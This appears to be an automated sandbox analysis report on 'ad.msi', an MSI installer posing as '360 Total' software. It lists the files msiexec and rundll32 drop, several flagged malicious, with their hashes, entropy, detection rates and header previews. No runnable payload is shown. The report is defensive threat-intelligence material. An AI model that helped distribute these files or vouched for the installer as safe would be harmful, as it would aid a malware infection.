                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):906752
                                                                Entropy (8bit):6.2833336520446625
                                                                Encrypted:false
                                                                SSDEEP:12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
                                                                MD5:74143402C40AC2E61E9F040A2D7E2D00
                                                                SHA1:4053DC85BB86C47C63F96681D6A62C21CD6342A3
                                                                SHA-256:1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                                                                SHA-512:4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                • Antivirus: Virustotal, Detection: 14%, Browse
                                                                Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................
                                                                Process:C:\Windows\System32\rundll32.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):906752
                                                                Entropy (8bit):6.2833336520446625
                                                                Encrypted:false
                                                                SSDEEP:12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
                                                                MD5:74143402C40AC2E61E9F040A2D7E2D00
                                                                SHA1:4053DC85BB86C47C63F96681D6A62C21CD6342A3
                                                                SHA-256:1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                                                                SHA-512:4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                • Antivirus: Virustotal, Detection: 14%, Browse
                                                                Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................
                                                                Process:C:\Windows\System32\rundll32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):74
                                                                Entropy (8bit):6.020264176439766
                                                                Encrypted:false
                                                                SSDEEP:3:oZ6u8EU9kWVn5pr28xp4ikc4S3:oCk2lxD4S
                                                                MD5:EE5D98CD3EF7D73FA9C2C0AC138AF0CB
                                                                SHA1:AAFC749A19F0EF684631ECB581D73DC2F8368230
                                                                SHA-256:873F91B643A5AA49D0E1B73FE00F2E695910E55BED995D79BC19BF8A6C7ECF63
                                                                SHA-512:3090DFDE9B13B1FED9FA90E193E81D83B962A5F48EB96470DF57A0FBCE6E16D8008789557D1A6E0EA9E385CCDBFD5760FEE97D1227EA89E2612BFC082AC010AC
                                                                Malicious:false
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                Category:dropped
                                                                Size (bytes):1619456
                                                                Entropy (8bit):7.152500797895932
                                                                Encrypted:false
                                                                SSDEEP:49152:QZH3YuW8zBQSc0ZnSKmZKumZr7A2BQTBG:+Y90Zn0K/A2OF
                                                                MD5:666151C11B7899A0C764ABE711D3F9B3
                                                                SHA1:35462114E096F4D307607D713136BFE38479870D
                                                                SHA-256:8041A15E27C785F2ADCCE9E8C643F5CC619B52E50CD36FF043D13C4089CE1CAD
                                                                SHA-512:835FEE905D540F1E3B4D32A0645041C9ADD6EA488675A8CA99DBE571CFAAEF5781BED8C1277DD7942BE7D672945D68A1016C2AB5CB645D539E07893D69672ADC
                                                                Malicious:false
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):401017
                                                                Entropy (8bit):6.591625418894829
                                                                Encrypted:false
                                                                SSDEEP:6144:RMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1p:RMvZx0FlS68zBQSncb4ZPQTpAjZxqO1p
                                                                MD5:8A1FD55346F6FA2061C1D401D9E9584E
                                                                SHA1:FDDB921F0E8BF8B522D9679AAB7F22AC1266642C
                                                                SHA-256:AD5FEF26009019FD8039F7FCCEEBBD6F52481C934DE8256F245A701A553FF304
                                                                SHA-512:5FA4B38B0AF4B65C6E767EE3FE55BA431C3EBB43208119A6A81A9E47C0A3F73E81702527373345EAE40CC49292B4126D9F161A49CD2C108E7949918D4F97A725
                                                                Malicious:false
                                                                Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}7.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}+.01:\Software\HuMaster LLC\360 Total\Version.@.......@.....@.....@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}5.C:\Users\user\AppData\Local\sharepoint\360total.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".7.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@....
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):399328
                                                                Entropy (8bit):6.589290025452677
                                                                Encrypted:false
                                                                SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.1615070252691617
                                                                Encrypted:false
                                                                SSDEEP:12:JSbX72FjciAGiLIlHVRpBh/7777777777777777777777777vDHFXIOQa704pOlN:J9QI5V1IidF
                                                                MD5:E7794FC0A6BBBE717940A0216B663179
                                                                SHA1:39D30989BA6DD902F9A0E479ACF268F337CA7DFE
                                                                SHA-256:1BEA89CC9A8D6E919463633236A3BBB953C7225645F855D77320BD9307CB6658
                                                                SHA-512:0CFEAF61D263BD06C4691C41988B60FB0804A450F926622D1E89C759B4E4D0AA5C874FCC3C0BBC7F5BEE0A7952503C530B66D37315E970A17ADC7483FE2FFBE5
                                                                Malicious:false
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.5808291684127274
                                                                Encrypted:false
                                                                SSDEEP:48:y8Ph4uRc06WXOGjT54b7SaVAErCycD27SGTR:dh41IjTub7JewCS3
                                                                MD5:52FED0FB187091045C487FB8DFD94B4E
                                                                SHA1:F31BA1FC0E04140F359F8F4521F61D2F14240D49
                                                                SHA-256:BAF14058494B03F9C94972B99A7C0E9FF375991BAFEF8C74B1847304278DEADD
                                                                SHA-512:AD6D42A2FD9049C2E5D96205A61B0F5BD7486074774A9123594842CB176406592B8F968FC4D789741C1BD18002E23BE8618285B1CE32E08D2C01786562A32B4B
                                                                Malicious:false
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):364484
                                                                Entropy (8bit):5.365507176161241
                                                                Encrypted:false
                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau7:zTtbmkExhMJCIpE8
                                                                MD5:280CA73046808255E54B977BFBF51E30
                                                                SHA1:24D156D2BBC408B970F48FB01B0F2135863862BC
                                                                SHA-256:BD962A71280FB8EEAE09F17ED877E08F7F48001CE760729B8B714D325395CB48
                                                                SHA-512:CF8FBB75B38ACA74698BFDBB32A0C79A2589B2ABC09388B9E9049D2C6B1B79FE2110E57C275DC352DD19E5ED99CA27A4E20F65A38F49CF0BD14381234ECA2FEB
                                                                Malicious:false
                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.5808291684127274
                                                                Encrypted:false
                                                                SSDEEP:48:y8Ph4uRc06WXOGjT54b7SaVAErCycD27SGTR:dh41IjTub7JewCS3
                                                                MD5:52FED0FB187091045C487FB8DFD94B4E
                                                                SHA1:F31BA1FC0E04140F359F8F4521F61D2F14240D49
                                                                SHA-256:BAF14058494B03F9C94972B99A7C0E9FF375991BAFEF8C74B1847304278DEADD
                                                                SHA-512:AD6D42A2FD9049C2E5D96205A61B0F5BD7486074774A9123594842CB176406592B8F968FC4D789741C1BD18002E23BE8618285B1CE32E08D2C01786562A32B4B
                                                                Malicious:false
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.2660861253773124
                                                                Encrypted:false
                                                                SSDEEP:48:zXwudBJvcFXOhT5O2b7SaVAErCycD27SGTR:7w9sTk2b7JewCS3
                                                                MD5:6705E201416C56C156C28221AD7102EC
                                                                SHA1:73A0103E661BFEAA7B78DFC07C1D674AA47CAA28
                                                                SHA-256:3440CFC8AFF2C8F157152ABF87C4E4913A9243B4B32350790FBF06BBFC0D5AB6
                                                                SHA-512:A4A85B82A35A325260D7EEC2F00CD15A604054F46A3A7E35BFE0C8F362B374D9AB20F4F7EB25D3D35C7BA6598072E8438A762BC3A659645BF8389116C182CA54
                                                                Malicious:false
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):0.1432228615371309
                                                                Encrypted:false
                                                                SSDEEP:24:vOUTx0EsipV0E+0EsipV0EgVAEV0yjCycVQwGqKO2TcT+:2UTGSrSaVAErCycD2TA
                                                                MD5:745F1BB958E3899442A36BEFDD0FB5DA
                                                                SHA1:A6A39411B3FE0ED0069D5B49BB87310C65876C62
                                                                SHA-256:631B21127B3419AB912BA3EBF654FB4973D009D9D430D56C65F739B8B9811C99
                                                                SHA-512:B0FF8AE595A462723297266335A86D15BEDAF3E6B2EA4CAA29074336674A1355D44928E2EA086937402D8E57D68351F42F031B81B11565643D6A31600AEDA72F
                                                                Malicious:false
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.2660861253773124
                                                                Encrypted:false
                                                                SSDEEP:48:zXwudBJvcFXOhT5O2b7SaVAErCycD27SGTR:7w9sTk2b7JewCS3
                                                                MD5:6705E201416C56C156C28221AD7102EC
                                                                SHA1:73A0103E661BFEAA7B78DFC07C1D674AA47CAA28
                                                                SHA-256:3440CFC8AFF2C8F157152ABF87C4E4913A9243B4B32350790FBF06BBFC0D5AB6
                                                                SHA-512:A4A85B82A35A325260D7EEC2F00CD15A604054F46A3A7E35BFE0C8F362B374D9AB20F4F7EB25D3D35C7BA6598072E8438A762BC3A659645BF8389116C182CA54
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.06805445723953887
                                                                Encrypted:false
                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOXvZ1UKkwQa70HLIAVky6lO:2F0i8n0itFzDHFXIOQa70uO
                                                                MD5:DDFE8FC02F97ED0B140BF8FEE34DBC22
                                                                SHA1:23118003F91DD54D01E75F1F22FC417A1F518DB5
                                                                SHA-256:47EBE8FB2E1FF000C6FD50F4ED992F9704EBE2816154A8637FEE2F9FCF0A97AA
                                                                SHA-512:39D6EEB91688280E34E5DA258220236BEB2A87A7B2EC5FF349CCC42A554863F54CA9DF53C0459B688B8408EF7F13D4083AC520E6B541CD4A347B3185BE2AFBB6
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.2660861253773124
                                                                Encrypted:false
                                                                SSDEEP:48:zXwudBJvcFXOhT5O2b7SaVAErCycD27SGTR:7w9sTk2b7JewCS3
                                                                MD5:6705E201416C56C156C28221AD7102EC
                                                                SHA1:73A0103E661BFEAA7B78DFC07C1D674AA47CAA28
                                                                SHA-256:3440CFC8AFF2C8F157152ABF87C4E4913A9243B4B32350790FBF06BBFC0D5AB6
                                                                SHA-512:A4A85B82A35A325260D7EEC2F00CD15A604054F46A3A7E35BFE0C8F362B374D9AB20F4F7EB25D3D35C7BA6598072E8438A762BC3A659645BF8389116C182CA54
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.5808291684127274
                                                                Encrypted:false
                                                                SSDEEP:48:y8Ph4uRc06WXOGjT54b7SaVAErCycD27SGTR:dh41IjTub7JewCS3
                                                                MD5:52FED0FB187091045C487FB8DFD94B4E
                                                                SHA1:F31BA1FC0E04140F359F8F4521F61D2F14240D49
                                                                SHA-256:BAF14058494B03F9C94972B99A7C0E9FF375991BAFEF8C74B1847304278DEADD
                                                                SHA-512:AD6D42A2FD9049C2E5D96205A61B0F5BD7486074774A9123594842CB176406592B8F968FC4D789741C1BD18002E23BE8618285B1CE32E08D2C01786562A32B4B
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                Entropy (8bit):7.152500797895932
                                                                TrID:
                                                                • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                • Microsoft Windows Installer (60509/1) 46.00%
                                                                • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                File name:ad.msi
                                                                File size:1'619'456 bytes
                                                                MD5:666151c11b7899a0c764abe711d3f9b3
                                                                SHA1:35462114e096f4d307607d713136bfe38479870d
